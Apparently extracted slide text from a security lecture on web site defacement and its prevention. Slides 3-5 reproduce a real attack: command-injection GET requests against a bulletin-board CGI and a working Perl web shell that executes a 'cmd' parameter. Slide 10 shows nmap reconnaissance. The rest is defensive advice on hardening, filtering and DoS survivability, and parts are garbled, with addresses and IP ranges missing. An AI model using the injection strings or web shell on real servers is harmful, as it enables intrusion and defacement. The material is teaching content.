1 Web Site Information If a web site has been defaced, chances are the attacker(s) visited the web site prior to the attack. The purpose of these visits was system reconnaissance Inappropriate information stored on the web site can aid in a direct attack and/or with an indirect attack like Social Engineering. Directory structures, filenames and even the html code itself can all contain valuable system information. The intruder will often use automated scripts or applications to download the target's web content and then scour through the html files off line. Teleport Pro and WGET are two popular automated tools for web site mirroring and reconnaissance.

2 Teleport Pro Example

3 Example Attack 1 This is a rough summary of an actual attack on the web site of InfoReading It began with the hacker requesting a GET on the URL: /board//postings.cgi?action=reply&forum=geekout&number=1&topic= |lynx -source > ubbtest.cgi|mail The hacker is taking advantage of a flaw in the Ultimate Bulletin Board system InfoReading used. In this case, he is piping the output of the bulletin board. allowing him to execute arbitrary commands on the system,

4 Example Attack 2 The hacker executed the command:which took the contents of the page1.cgi file from galaktica.org, and overwrote the contents of ubbtest.cgi with that file. And then he ed himself the results. The new file: lynx -source > ubbtest.cgi|mail #!/usr/bin/perl #uses the CGI module(like a c #include <> statement.) use CGI; #creates a new CGI item. $in = new CGI; #read the "cmd" argument that was passed to it by the browser. $file=$in->param('cmd'); #print the return header type. print "Content-Type: text/html\n\n"; #open the file, the "|" at the end is to indicate that this is an executable # that perl will be reading the output of. open (FILE, "$file|"); #and finally, loop thru each line of the FILE, and print the results. while () { print $_; }

5 Example Attack 3 The following line was used to 'chmod' the file, marking it as executable: Now he has a fully executable customized CGI to run whatever he wants. At this point he performed 2 actions, getting an index.html file, and a Shockwave Animation: GET /board//postings.cgi?action=reply&forum=geekout&number=1&topic= |chmod 755 ubbtest.cgi|mail GET /board/ubbtest.cgi?cmd=lynx -source > ../index.html GET /board/ubbtest.cgi?cmd=lynx -source > ../Movie2.swf

6 Preventing Web Defacements

7 Harden the OS The undeniable symbiotic relationship between a Web server and its underlying OS can not be overstated. Both the Web server and the OS could potentially be used to exploit each other. For instance, a vulnerable version of the BIND daemon could potentially give an attacker command line access to the system. This unauthorized access could put the web site's contents into jeopardy. Conversely, a web server running a vulnerable version of the CGI script PHF could allow an intruder to illegally access the OS password file. Addressing the security concerns of a Web server and ignoring the system OS is akin to locking the front door of a house while leaving the backdoor wide open. Therefore, it is imperative to harden the OS to truly prevent a web site defacement.

8 Harden the Web Server Unfortunately, most web server's default system settings are not adequate for deployment on today's Internet. Usually these default settings are configured with a much too open mindset. The opposite should be true Default access controls should start off with total restriction and access rights should be applied appropriately

9 Do Not Run the Web Server as RootWhen a web server is first started, it operates with the privileges of a specified OS user. All of the child processes that the web server then spawns will run with the privileges of this system user. Attackers often scan for web servers searching for one running as the "root" system user. NMAP has a runtime flag (-I ) that will query a server for the application owner. If the web server is running the Ident service, it will announce which OS user owns each network application.

10 Nmap Example bash-2.03$ nmap –sT –p 80 –I –O www.hostname.comStarting nmap V.2.12 by Fyodor Interesting ports on (xxx.xxx.xxx.xxx); Port State Protocol Service Owner open tcp http root TCP Sequence Prediction, Class-random positive increments Difficulty = Remote operating system guess: Linux ; 2.2.0-pre Nmap run completed – 1 IP address (1 host up) scanned in 1 second

11 Ownership/PermissionsCreate specific users to run Web services webserver  Runs the Web server webadmin  Owns config/logs files webdev  Owns web content Determine each user’s responsibility Apply Web ownership and permissions appropriately

12 Automatic Directory ListingAutomatic directory listing is a server function that will list all of the files within a requested directory if the normal base file (index.html/home.html/default.html) is not present. When a user requests the main page of a web site, they normally type in the following URL The web server processes this request and searches the document root directory for the file named index.html and sends this page to the client. If this page is not present, the web server will issue a directory listing and send the output to the client. Turn off automatic directory listing. Directory listings reveal too much information about a website's content and directory structure.

13 Preventing Invalid Displays 1Change the name of the default index page Change from index.html or default.html Normal index directive in iPlanet PathCheck fn="find-index" indexnames= “index.htm,index.html“ Change it to something else PathCheck fn="find-index" indexnames= “main.htm,main.html“ This deters “Assumption”Attacks Attacker assumes that the default page is named index.html Using URL exploits to deface the main webpage becomes very difficult

14 Preventing Invalid Displays 2Taking it one step further Use typical BlackHat naming tactic Non-printable Characters Naming directories for Rootkits ". " (dot, space, space) ".. " (dot, dot, space, space) Use same idea for naming the default file mv index.htm "index.htm “ Notice the space after the htm/html?

15 Monitor Changes How can you be immediately notified if content changes? Run a shell script continuously in the background to monitor html page properties Size Owner/Group Permissions Last Access Time It compares stats against that last run and checks for differences If differences are found, it sends an to SysAdmins with vital info Files changed Who is logged in

16 General Defenses (what to do prepare for any attack)The most general form of defense against any and all attacks is: Increase user awareness Maintain and patch all software Maintain and update anti-virus software Audit the system on a regular basis Install a firewall Install an IDS

17 DoS Defense Protecting a network and systems from DoS attacks centers around three topics: Designing the network and systems for survivability Monitoring ongoing operations – knowing what’s “normal” for your network so that you can detect changes to this normal behavior Preparing the organization in nontechnical ways so personnel are prepared to react effectively

18 General Principles of SurvivabilitySeparate, or compartmentalize, critical services wherever practical. Overprovision as much as possible. Have more capacity than you need on a typical day to the extent permitted by your constraints of time, money, resources, or complexity. Minimize your “target cross-section.” a well- implemented network can present a small target to attackers by limiting publicly visible systems and services to the minimum required to meet the business needs of the organization.

19 Separation The separation of critical services from noncritical services can occur on many levels. At the physical layer, you might use redundant links, each connected to different ISPs via different carrier networks routed through diverse paths. Additionally, you can gain additional redundancy by using multiple data centers or hosting locations. At the link layer, separation could involve the isolation of broadcast and/or collision domains through the use of multiple hubs, switches, VLANs or ELANs This helps reduce the risk of “ARP storms” during heavy scanning events or DoS attacks. At the network layer, IP subnetting allows for increased control of traffic between systems, thereby limiting the damage an attack on one system or subnet can do to another. Subnetting can also help isolate publicly visible systems and services from internal systems by establishing a DMZ (demilitarized zone) between the external andinternal networks.

20 Overprovision To keep your systems operating during a period of heavy load, you need more computing capacity than your organization normally requires. You need to make provisions for sudden surges in network traffic, regardless of their source. Extra capacity may take many forms—bandwidth, memory, processor speed, TCP connection buffers, and other resources.

21 Minimize the Target Reducing the target you present a potential attacker can be achieved through a number of methods. The primary objectives are to present a small initial target limit the damage that an attack on that target can have.

22 Disable Unnecessary ServicesOne method of minimizing the target “cross-section” is to disable all unnecessary services As an example of the “principle of least privilege,” all services that are not expressly required for business operations should be disabled. Many operating systems have numerous services enabled by default, unnecessarily exposing networks to attacks that aren’t even related to the particular service they intend (or need) to provide.

23 Hide Information Hide the internals of your network.In many situations, there is little need for external users to be able to gather information about internal network configurations. Use of split-DNS, Network Address Translation (NAT), and blocking ICMP messages at the network edges can be effective methods to reduce the leakage of internal configuration details to the outside world.

24 Filter Traffic Filter all non-essential traffic as close to the source as possible. By dropping unneeded traffic as early as possible in a network (through the use of ingress and egress filtering), the impact of a DoS attack may be limited to the edges of the network. When done properly, traffic filtering can help protect your systems from being overloaded by intercepting the attack upstream, and it can limit the risk of attackers using your systems for an attack on another site.

25 Example Filters Configure routers to deny IP broadcast traffic onto your network from other networks. In almost all cases, IP-directed broadcast functionality is not needed. This is especially effective against SMURF Attacks Configure hosts to NOT reply to a packet sent to a broadcast address Egress filtering routers drop packets that would leave your domain (or subnet!) with an address that has not been assigned to sources in your domain Ingress filtering routers drop packets from sub domains as they enter into the host if the packets are not addressed properly.

26 Invalid Addresses The following networks are defined as reserved private networks, and no traffic should ever be received from or transmitted to these networks through a router: to (reserved) to (loopback) to (reserved) to (reserved) and (broadcasts)

27 Principle One: SurvivabilitySurvivability is the ability of a network computing system to provide essential services in the presence of attacks and failures, and to recover full services in a timely manner. The main objective of designing networks and systems to protect against DoS attacks is to keep critical services operational as long as possible during an attack. In some cases, that may not be enough, since the attacker may be able to completely overwhelm your network’s capacity. In that event, however, the issue becomes a business continuity issue rather than a technical one.